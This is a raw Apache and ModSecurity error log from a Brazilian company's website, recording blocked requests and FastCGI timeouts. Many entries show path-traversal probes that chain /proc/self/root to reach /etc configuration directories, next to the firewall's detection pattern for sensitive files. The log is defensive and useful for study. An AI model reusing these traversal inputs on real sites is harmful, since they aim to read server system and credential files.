[Thu Mar 19 03:36:04.128996 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33610] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:36:04.815816 2026] [mime_magic:error] [pid 27293:tid 140411666392832] (70014)End of file found: [client 57.141.18.79:35740] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:36:22.672456 2026] [core:alert] [pid 30077:tid 140411540502272] [client 74.7.241.31:53058] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib
[Thu Mar 19 03:36:24.389788 2026] [mime_magic:error] [pid 17887:tid 140411574073088] (70014)End of file found: [client 57.141.18.55:35564] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:36:34.126108 2026] [proxy_fcgi:error] [pid 27293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34292] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:36:36.396953 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:54590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuZdNa6ubjKNq_cu4YCegAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:36:53.346159 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.244.43:38324] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuZheoXxyEfFpUF8f_VvgAAAUI"]
[Thu Mar 19 03:37:04.141794 2026] [proxy_fcgi:error] [pid 27403:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34952] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:37:36.133831 2026] [proxy_fcgi:error] [pid 27403:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35654] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:38:06.125793 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36410] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:38:28.860881 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:36536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuZ5AkwaGbbGflqUZB38wAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:38:32.141775 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37022] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:38:55.136384 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:39:11.539747 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.228.61:41484] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuaDwkwaGbbGflqUZB4GgAAAMc"]
[Thu Mar 19 03:39:18.089846 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38126] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:39:41.005810 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:39:53.229232 2026] [mime_magic:error] [pid 17653:tid 140411548894976] (70014)End of file found: [client 57.141.18.115:41454] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:40:02.221846 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39228] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:40:10.339241 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.243.128:49562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuaSv-YZRR_7pZ7nDJR4wAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:40:24.129777 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39784] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:40:32.575643 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] [client 179.188.53.243:46610] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.575690 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (104)Connection reset by peer: [client 179.188.53.243:46610] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.589660 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] [client 179.188.53.243:44254] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.589713 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (104)Connection reset by peer: [client 179.188.53.243:44254] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.621803 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] [client 179.188.53.243:41404] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.621846 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (104)Connection reset by peer: [client 179.188.53.243:41404] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.623972 2026] [proxy_fcgi:error] [pid 19093:tid 140411624429312] [client 179.188.53.243:43386] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.623990 2026] [proxy_fcgi:error] [pid 19093:tid 140411624429312] (104)Connection reset by peer: [client 179.188.53.243:43386] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.625883 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] [client 179.188.53.243:45972] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.625925 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (104)Connection reset by peer: [client 179.188.53.243:45972] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.626452 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] [client 57.141.18.32:42290] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.626482 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] (104)Connection reset by peer: [client 57.141.18.32:42290] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.627847 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] [client 179.188.53.243:42738] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.627868 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (104)Connection reset by peer: [client 179.188.53.243:42738] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.628187 2026] [proxy_fcgi:error] [pid 14269:tid 140411641214720] [client 179.188.53.243:45192] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.628207 2026] [proxy_fcgi:error] [pid 14269:tid 140411641214720] (104)Connection reset by peer: [client 179.188.53.243:45192] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.629325 2026] [proxy_fcgi:error] [pid 19093:tid 140411632822016] [client 179.188.53.243:40890] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.629348 2026] [proxy_fcgi:error] [pid 19093:tid 140411632822016] (104)Connection reset by peer: [client 179.188.53.243:40890] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.631743 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] [client 57.141.18.74:41872] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.631777 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (104)Connection reset by peer: [client 57.141.18.74:41872] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.632069 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:41114] AH01067: Failed to read FastCGI header, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/systemd/user
[Thu Mar 19 03:40:32.632086 2026] [proxy_fcgi:error] [pid 27403:tid 140411607643904] [client 179.188.53.243:42036] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.632091 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (104)Connection reset by peer: [client 74.7.241.31:41114] AH01075: Error dispatching request to : , referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/systemd/user
[Thu Mar 19 03:40:32.632102 2026] [proxy_fcgi:error] [pid 27403:tid 140411607643904] (104)Connection reset by peer: [client 179.188.53.243:42036] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.633812 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] [client 179.188.53.243:47158] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.633836 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (104)Connection reset by peer: [client 179.188.53.243:47158] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.636482 2026] [proxy_fcgi:error] [pid 14269:tid 140411649607424] [client 74.7.243.128:60764] AH01067: Failed to read FastCGI header, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/sys
[Thu Mar 19 03:40:32.636510 2026] [proxy_fcgi:error] [pid 14269:tid 140411649607424] (104)Connection reset by peer: [client 74.7.243.128:60764] AH01075: Error dispatching request to : , referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/sys
[Thu Mar 19 03:40:32.639521 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] [client 179.188.53.243:40332] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.639545 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (104)Connection reset by peer: [client 179.188.53.243:40332] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.643086 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] [client 57.141.18.65:42434] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.643115 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] [client 57.141.18.39:42452] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.643145 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] [client 57.141.18.3:42300] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.643140 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (104)Connection reset by peer: [client 57.141.18.65:42434] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.643159 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (104)Connection reset by peer: [client 57.141.18.39:42452] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.643174 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (104)Connection reset by peer: [client 57.141.18.3:42300] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.643186 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] [client 57.141.18.18:42190] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.643214 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (104)Connection reset by peer: [client 57.141.18.18:42190] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.643515 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] [client 57.141.18.55:42248] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.643526 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (104)Connection reset by peer: [client 57.141.18.55:42248] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:32.644706 2026] [proxy_fcgi:error] [pid 19093:tid 140411565680384] [client 57.141.18.87:42476] AH01067: Failed to read FastCGI header
[Thu Mar 19 03:40:32.644730 2026] [proxy_fcgi:error] [pid 19093:tid 140411565680384] (104)Connection reset by peer: [client 57.141.18.87:42476] AH01075: Error dispatching request to : 
[Thu Mar 19 03:40:47.379881 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.241.31:53834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuab_-YZRR_7pZ7nDJSCQAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:41:07.496028 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:53588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuagwkwaGbbGflqUZB4cgAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:41:11.280037 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.241.31:49726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuah1_V7PWP6ixUYl6AxgAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:41:23.975522 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:49736] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuak-oXxyEfFpUF8f_WWQAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:41:26.708418 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.241.31:43290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abualsdf6f5d65gmYZQ31QAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:41:37.769984 2026] [mime_magic:error] [pid 26799:tid 140411658000128] (70014)End of file found: [client 57.141.18.95:43824] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:41:54.766745 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.244.43:46100] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuasgbLMZ6AikZjR9UiKQAAAA8"]
[Thu Mar 19 03:42:30.005016 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.243.128:58138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abua1v-YZRR_7pZ7nDJScQAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:42:44.453398 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.241.31:56252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abua41_V7PWP6ixUYl6BHwAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:42:50.155888 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:50222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abua6gkwaGbbGflqUZB4tgAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:43:25.427068 2026] [mime_magic:error] [pid 15826:tid 140411699963648] (70014)End of file found: [client 57.141.18.106:46856] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:43:30.996510 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.243.128:56548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abubEgbLMZ6AikZjR9UiiQAAABI"], referer: 